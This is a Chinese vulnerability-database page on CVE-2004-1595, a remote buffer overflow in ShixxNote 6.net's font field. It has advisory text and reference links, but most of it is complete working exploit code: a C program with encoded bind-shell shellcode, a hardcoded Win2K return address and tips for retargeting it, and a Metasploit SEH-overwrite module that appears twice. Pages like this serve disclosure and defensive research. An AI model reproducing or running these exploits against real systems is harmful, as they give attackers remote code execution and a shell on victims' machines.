CVE-2004-1595
CVSS7.5
发布时间 :2004-10-13 00:00:00
修订时间 :2016-10-17 22:57:16
NMCOEPS    

[原文]Buffer overflow in ShixxNote 6.net build 117 allows remote attackers to execute arbitrary code via a long font field.


[CNNVD]ShixxNOTE 6.net远程缓冲区溢出漏洞(CNNVD-200410-013)

        
        ShixxNOTE 6.net是一种集个人日程管理、笔记贴士、即时信息传送等功能为一体的软件。
        ShixxNOTE 6.net在处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1595
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1595
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-013
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109778648232233&w=2
(UNKNOWN)  BUGTRAQ  20041013 Buffer-overflow in ShixxNOTE 6.net
http://www.securityfocus.com/bid/11409
(VENDOR_ADVISORY)  BID  11409
http://xforce.iss.net/xforce/xfdb/17705
(VENDOR_ADVISORY)  XF  shixxnote-font-bo(17705)

- 漏洞信息

ShixxNOTE 6.net远程缓冲区溢出漏洞
高危 边界条件错误
2004-10-13 00:00:00 2005-10-20 00:00:00
远程  
        
        ShixxNOTE 6.net是一种集个人日程管理、笔记贴士、即时信息传送等功能为一体的软件。
        ShixxNOTE 6.net在处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        ShixxNOTE
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.shixxnote.com/

- 漏洞信息 (590)

ShixxNote 6.net Remote Buffer Overflow Exploit (EDBID:590)
windows remote
2004-10-22 Verified
2000 class101
N/A [点击下载]
/*
   ShixxNote 6.net buffer overflow exploit v0.1
   Public exploit overflows only Win2K systems, else crashs.
   Exploit code by class101 [at] DFind.kd-team.com
   Bind a shellcode to the port 101.
   Thanx to Luigi Auriemma(aluigi at altervista org) for the bug discovery
   Thanx to HDMoore and Metasploit.com for their kickass ASM work.
   Why Win2k only?
   After some days of debugging on it , I finally figured out how to exploit this
   hole, this public overflow method works only on Win2k, using the
   JMP EBX from comdlg32.dll from Win2k SP4 english.
   Because on WinXP , the register EBX points to a NULL address, this is not exploitable
   even if you update the JMP EBX, not exploitable VIA THIS WAY on XP I mean OK!.
   How do I did then on Win2k?
   I overwritte EIP with a JMP EBX, EBX is a perfect register because it points directly
   to my buffer, but problem, it points 4 bytes only before EIP, quite short...
   But enough to say him to jump ~80 bytes higher.
   Now i have enough space to adjust my shellcode to ESI and to finally jump to it...
   That's why on WinXP (and maybe others , havent tested) this doesnt works because EBX isnt
   available.
   Not happy? code yours or get a pvt version ;p
   How do I update to Win2k SP1 Dutch for example ?
   Grab a JMP EBX address in comdlg32.dll from this OS and update the code.
   Take a look at www.KD-Team.com, really nice peaces of code to find. Good job DiabloHorn ;)
   Take a look at www.GovernmentSecurity.org, good public place if you ignore all lame threads ^^ and all
   retarded, without to name them to not add credits to their stupidity....
   Greets cp, and sorry jester ....
 */

#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")

//BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

/*
//Execute regedit.exe, XORed 0x88, hardcoded Win2k SP4 English
char scode2[] = "\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\xF5\x3C\x4E\xCD\x7C\xFA\x4E\xCD"
"\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x70\xEC\x4E\xCD\x71\xE1\x4E\xCD"
"\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x75\xF0\x4E\xCD\x76\xED\x4E\xCD"
"\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\xB7\xC8\xD0\xF4\x77\x58\xE0\x89"
"\x88\x88\x88\x30\xF5\x86\xD0\xF4\x77\x58\x68\x61\x63\x6B\x90";

 */
static char payload[5000];
char jmpebxw2k[]="\x79\x3c\xb6\x76"; //JMP EBX - comdlg32.dll - Win2k SP4 English
void usage(char* us);
WSADATA wsadata;
void ver();

int main(int argc,char *argv[])
{
 ver();
 if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}
 if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
 int ip=htonl(inet_addr(argv[1])), sz, port, sizev, sizew, sizex, sizey, sizez, v, w, x, y, z;
 if (argc=3){port=atoi(argv[2]);}
 else port=2000;
 SOCKET s;
 struct fd_set mask;
 struct timeval timeout;
 struct sockaddr_in server;
 s=socket(AF_INET,SOCK_STREAM,0);

 if (s=INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
 server.sin_family=AF_INET;
 server.sin_addr.s_addr=htonl(ip);
 server.sin_port=htons(port);
 WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
 timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
 switch(select(s+1,NULL,&mask,NULL,&timeout))
 {
  case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
  case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
  default:
   if(FD_ISSET(s,&mask))
   {
    cout<<"[+] connected, constructing the payload..."<<endl;
    Sleep(1000);
    sizev=5;
    sizew=88;
    sizey=800-sizeof(scode);
    sizex=5;
    sizez=20;
    sz=sizev+sizew+sizex+sizez+sizeof(scode)+sizey;
    memset(payload,0,sizeof(payload));
    strcat(payload,"");
    for (v=0;v<sizev;v++){strcat(payload,"\x61");}
    strcat(payload,"\x66\x8b\xf3");
    strcat(payload,"\x66\x83\xc6\x09");
    strcat(payload,"\xff\xe6");
    for (w=0;w<sizew;w++){strcat(payload,"\x61");}
    strcat(payload,"\xeb");
    strcat(payload,"\x9d\x61\x61");
    strcat(payload,jmpebxw2k);
    for (x=0;x<sizex;x++){strcat(payload,"\x90");}
    strcat(payload,scode);
    for (y=0;y<sizey;y++){strcat(payload,"\x61");}
    for (z=0;z<sizez;z++){strcat(payload,"~");}

    if (send(s,payload,strlen(payload),0)=SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
    cout<<"[+] size of payload: "<<sz<<endl;
    cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
    return 0;
   }

 }

 closesocket(s);
 WSACleanup();
 return 0;
}

void usage(char* us)
{
 cout<<"USAGE: 101_shixx.exe Ip Port\n"<<endl;
 cout<<"NOTE: "<<endl;
 cout<<" The port 2000 is default if no port specified."<<endl;
 cout<<" The exploit bind a shellcode to the port 101."<<endl;
 cout<<" Public version - Win2k systems only"<<endl;
 cout<<" Update the JMP address for another SP/Language"<<endl;
 return;
}
void ver()
{
 cout<<endl;
 cout<<" "<<endl;
 cout<<" ==========================[v0.1]=="<<endl;
 cout<<" ====ShixxNote 6.net, Remote Buffer Overflow Exploit===="<<endl;
 cout<<" ===coded by class101======[DFind.kd-team.com 2004]=="<<endl;
 cout<<" ==============================="<<endl;
 cout<<" "<<endl;
} 

// milw0rm.com [2004-10-22]
		

- 漏洞信息 (16454)

ShixxNOTE 6.net Font Field Overflow (EDBID:16454)
windows remote
2010-06-15 Verified
0 metasploit
N/A [点击下载]
##
# $Id: shixxnote_font.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ShixxNOTE 6.net Font Field Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in ShixxNOTE 6.net.
				The vulnerability is caused due to boundary errors in the
				handling of font fields.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					['CVE', '2004-1595'],
					['OSVDB', '10721'],
					['BID', '11409'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 650,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',

			'Targets'        =>
				[
					[ 'ShixxNOTE 6.net Universal', { 'Ret' => 0x10041951 } ],
				],

			'Privileged'     => false,

			'DisclosureDate' => 'Oct 4 2004',

			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(2000)
			], self.class)

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  =  rand_text_alpha_upper(8, payload_badchars)
		sploit  += "~~"
		sploit  += rand_text_alpha_upper(118, payload_badchars)

		seh     =  generate_seh_payload(target.ret)

		sploit[112, seh.length] = seh
		sploit  += rand_text_alpha_upper(200, payload_badchars)
		sploit  += "~" * 10

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F82945)

ShixxNOTE 6.net Font Field Overflow (PacketStormID:F82945)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2004-1595
[点击下载]

This Metasploit module exploits a buffer overflow in ShixxNOTE 6.net. The vulnerability is caused due to boundary errors in the handling of font fields.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ShixxNOTE 6.net Font Field Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in ShixxNOTE 6.net.
				The vulnerability is caused due to boundary errors in the
				handling of font fields.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2004-1595'],
					['OSVDB', '10721'],
					['BID', '11409'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 650,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'ShixxNOTE 6.net Universal', { 'Ret' => 0x10041951 } ], 
				],

			'Privileged'     => false,

			'DisclosureDate' => 'October 4 2004',

			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(2000)
				], self.class)

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  =  rand_text_alpha_upper(8, payload_badchars)
		sploit  += "~~"
		sploit  += rand_text_alpha_upper(118, payload_badchars)
		
		seh     =  generate_seh_payload(target.ret)
		
		sploit[112, seh.length] = seh
		sploit  += rand_text_alpha_upper(200, payload_badchars)
		sploit  += "~" * 10

		sock.put(sploit)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

10721
ShixxNOTE Message Font Field Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

The ShixxNote application is used to send and store messages. Each message contains font information, including specifically a font description field. An overly long value supplied for this field will cause a buffer overflow; according to the published exploit, anything larger than 1698 bytes will completely overwrite the return address, allowing for arbitrary code execution.

- 时间线

2004-10-13 2004-10-13
2004-10-13 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

ShixxNOTE 6.net Remote Buffer Overflow Vulnerability
Boundary Condition Error 11409
Yes No
2004-10-13 12:00:00 2007-11-15 12:36:00
Luigi Auriemma <aluigi@autistici.org> disclosed this vulnerability.

- 受影响的程序版本

ShixxNOTE ShixxNOTE 6.net

- 漏洞讨论

ShixxNOTE 6.net is reported susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly perform boundary checks before copying user-supplied strings into finite process buffers.

An attacker may leverage this issue to execute arbitrary code on a vulnerable computer with the privileges of the user running the vulnerable application.

- 漏洞利用

Example exploits have been provided by Luigi Auriemma and "class 101" <class101@phreaker.net>:

- 解决方案

The vendor has released an update to address this issue. Please see the references for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站